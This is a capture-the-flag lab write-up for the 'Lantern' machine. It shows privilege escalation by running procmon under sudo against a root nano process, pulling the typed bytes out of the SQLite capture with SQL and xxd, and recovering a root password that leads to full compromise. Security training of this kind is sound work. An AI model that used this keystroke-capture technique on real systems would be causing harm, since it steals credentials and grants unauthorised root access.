InfoSec LAB

Lantern_Privilege_Escalation

Created: 4 min read

automation.sh

Up until this point, the /root/automation.sh script has been brought up multiple times.

  • It was initially discovered during the basic system enumeration upon the initial foothold
    • It was BEING edited by nano
  • It was then picked up by PSPY
    • for removal of the .swp file, which is generated when the file is being edited by a text editor
  • Through mail, the HR requested the tomas user to check out the /root/automation.sh script

Based on the observations above, it is safe to speculate that the tomas user is currently editing the /root/automation.sh script with nano under the security context of the root account

tomas@lantern:~$ ll /root/automation.sh
ls: cannot access '/root/automation.sh': Permission denied

While I am unable to read the script as the tomas user in the current session, I can leverage the sudo privilege of the tomas user to attempt to MitM the editing

Process Capture with procmon

tomas@lantern:~$ ps -auxwww | grep -i nano
root        9637  0.0  0.1   7404  4216 pts/0    Ss+  22:30   0:00 nano /root/automation.sh

I will first need to identify the PID of the process; 31328

tomas@lantern:~$ sudo -u root /usr/bin/procmon -p 9637 -e write

Then, I can execute procmon with the PID to capture the entire process The -e flag was given to only capture the write operation

Initially, it’s empty

A moment later, there are so many entries being populated. A total of 5000 write operations for nano

I can then export the entire capture

tomas@lantern:~$ ll procmon*
-rw-r--r-- 1 root root 1343488 Aug 20 22:47 procmon_2024-08-20_22:42:37.db

procmon will generate a DB file, containing the capture

┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ scp -i ./id_rsa.tomas tomas@lantern.htb:~/procmon_2024-08-20_22:42:37.db .
procmon_2024-08-20_22:42:37.db                                                                        100% 1312KB   3.2MB/s   00:00

I will then transfer the DB file back to Kali via scp for examination

Inspection

The DB file is in the SQLite format and contains 3 tables; ebpf, metadata, and stats

  • ebpf: This table might contain the bytecode or information related to the specific eBPF programs that were running.
  • metadata: This table likely contains contextual information such as timestamps, process IDs, or descriptions of the monitored events.
  • stats: This table probably stores performance statistics or counters related to the events monitored by the eBPF programs.

eBPF (Extended Berkeley Packet Filter) is a technology used primarily in Linux to execute custom bytecode within the kernel, allowing for efficient monitoring, tracing, and handling of network packets, system calls, and other kernel events.

Pattern

sqlite> select * from ebpf;
606|139953235044487$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|laurel|laurel|787|47968709326242|write|13225|
9879|139737857394823$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|6|47969412042975|write|9978|
9879|139737857394823$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|47969412042975|write|30146|
 
[...REDACTED...]

Inspecting the ebpf table, the arguments column appear to contain binary blob data, which may contain user input as the name suggests

Filtering all the entries by duration from high to low reveals an interesting pattern

That the data contained from 9th byte to 35th byte. The rest are null-bytes

sqlite> select hex(substring(arguments,9,resultcode)) from ebpf where resultcode > 0 order by timestamp;

I can then use the substring function to list out the content of the argument column from the 9th byte to the length of the resultcode column, and wrap everything in the hexadecimal format as the data itself is a binary blob

I will save the content into the hex_out.txt file

┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ cat hex_out.txt | tr -d '\n' | xxd -r -p
e
e
e
echo Q 33EEddddttddww33ppMMBB | s uuddoo . //bbaacckkuupp..sshh

Then I can convert the extracted data into the ASCII format.

echo Q3Eddtdw3pMB | sudo ./backup.sh The above is after removing those duplicate characters Q3Eddtdw3pMB is likely the password of the root account

Validation

tomas@lantern:~$ su root
Password: Q3Eddtdw3pMB
root@lantern:/home/tomas# whoami
root
root@lantern:/home/tomas# hostname
lantern
root@lantern:/home/tomas# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:84:b0 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.229.250/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2689sec preferred_lft 2689sec
    inet6 dead:beef::250:56ff:fe94:84b0/64 scope global dynamic mngtmpaddr 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe94:84b0/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks